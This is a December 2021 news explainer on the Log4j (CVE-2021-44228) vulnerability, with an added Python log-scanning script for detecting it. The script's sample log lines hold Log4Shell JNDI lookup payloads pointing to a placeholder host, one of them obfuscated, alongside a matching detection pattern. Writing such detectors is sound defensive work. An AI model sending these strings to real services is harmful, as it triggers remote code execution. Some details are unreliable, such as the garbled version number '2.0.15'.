Background

The 'Log4j' Bug, And How It Affects Software From Minecraft To Apple And Beyond

Log4j

Java is a popular programming language that runs in an enormous range of software and devices. It is the programming language behind a great deal of everyday technology.

One reason is Java's platform independence. A Java program can run on many different types of computer; as long as the computer has a Java Runtime Environment (JRE) installed, the program can run on it.

In other words, most types of computer can run Java: PCs running Windows, Macs, Unix or Linux computers, mainframes, as well as mobile devices, IoT devices, and more.

And when a bug is found in the programming language, it can send a ripple so big that it can disrupt pretty much everything.

And the 'Log4j' bug is one that forced the internet to scramble for a fix.

The bug is so critical and severe simply because Log4j is a logging tool for Java.

The tool is flexible and powerful, and is used in almost all Java apps out in the wild. This is because a logging tool is needed to record almost everything that happens while Java software is running, which lets developers go back and fix the inevitable problems that crop up.

Because Log4j is used in almost all apps, even those made by some of the largest tech companies in the world, security researchers and officials, including the director of cybersecurity at the National Security Agency (NSA), sounded the alarm.

Tracked as CVE-2021-44228, the vulnerability is classed as severe, with a CVSS score of 10, the highest possible severity rating.

The issue is so severe because Log4j stores a treasure trove of critical data.

The bug allows hackers to get a glimpse of sensitive information, and allows malicious actors to take remote control of targets' devices through unauthenticated remote code execution when an application that uses the Java logging library is run.

This is possible because Log4j does a poor job of "sanitizing" the data it takes in, allowing attackers to sneak malicious code into the log.

It is reported that the bug is already being exploited in the wild.

Systems and services that use the Java logging library Apache Log4j, versions 2.0 through 2.14.1, are all affected, including many services and applications written in Java.

[Image: Log4j bug. Credit: Trend Micro]

The flaw was first detected in Minecraft, which is owned by Microsoft. But researchers warned that cloud applications are also vulnerable, because practically anything that uses Apache Struts is "likely vulnerable."

Organizations can identify whether they are affected by examining the log files of any services that use affected Log4j versions.

If those logs contain user-controlled strings (CERT NZ uses the example of Jndi:ldap), the services could be affected.

Before a patch can be properly implemented, users should set log4j2.formatMsgNoLookups to true by adding -Dlog4j2.formatMsgNoLookups=true to the JVM command used to start the application.
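As an added illustration of the log check CERT NZ describes (example code written for this article, not from CERT NZ, Apache, or any of the vendors mentioned), the Python script below scans access-log lines for the "${jndi:" lookup marker case-insensitively, records which lookup scheme (ldap, rmi, dns) each hit used, and tallies them for triage. The sample log lines are constructed, and the hostnames in them use the reserved .invalid domain so they resolve to nothing.

```python
import re
import sys

# Case-insensitive match for a Log4j JNDI lookup inside logged user-controlled
# text, the indicator CERT NZ points to ("Jndi:ldap" in its example). The
# scheme after the colon is captured so hits can be grouped for triage.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)", re.IGNORECASE)

# Constructed sample access-log lines (not real traffic). Line 2 and line 3
# carry the lookup in the User-Agent field, line 3 with mixed case and spaces;
# line 4 carries an unrelated ${date:...} lookup that must not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example.invalid/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 512 "-" "${ Jndi:Ldap://scanner.example.invalid/b }"',
    '10.0.0.7 - - [13/Dec/2021:10:02:00 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"',
]


def scan_log_lines(lines):
    """Return one finding per line that contains a JNDI lookup string.

    Each finding records the 1-based line number, the lowercased lookup
    scheme and the raw line, so an analyst can pivot to the source address.
    """
    findings = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(line)
        if match:
            findings.append({
                "line": number,
                "scheme": match.group("scheme").lower(),
                "text": line.rstrip("\n"),
            })
    return findings


def summarise(findings):
    """Count findings by lookup scheme (ldap, rmi, dns, ...)."""
    counts = {}
    for finding in findings:
        counts[finding["scheme"]] = counts.get(finding["scheme"], 0) + 1
    return counts


def scan_file(path):
    """Scan a log file on disk; undecodable bytes are replaced, not skipped."""
    with open(path, encoding="utf-8", errors="replace") as handle:
        return scan_log_lines(handle)


if __name__ == "__main__":
    # Usage: python scan_log4j.py [access.log]; without an argument the
    # constructed sample lines are scanned.
    results = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_log_lines(SAMPLE_LOG_LINES)
    for finding in results:
        print(f"line {finding['line']} scheme={finding['scheme']}: {finding['text']}")
    print("summary:", summarise(results))
```

A hit means the lookup string reached the log, not that the lookup was resolved, so correlate hits with unexpected outbound LDAP, RMI or DNS connections from the logging host. This plain match is a first pass only; attackers have also used obfuscated forms of the lookup that a simple pattern misses. Note too that the -Dlog4j2.formatMsgNoLookups=true workaround described above only takes effect on Log4j 2.10 and later, so for older releases upgrading is the only real fix.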

According to Apache's advisory, as of Log4j 2.0.15 (released on December 6th) the vulnerable configurations are disabled by default.

Apache has detailed the flaw on its Log4j2 vulnerabilities page, and credited Chen Zhaojun from Alibaba Cloud Security Team.

Minecraft has published an advisory that said the company had addressed the Log4j 2 vulnerability, but urged players and Minecraft server hosts to take additional steps to protect themselves.

Published: 
14/12/2021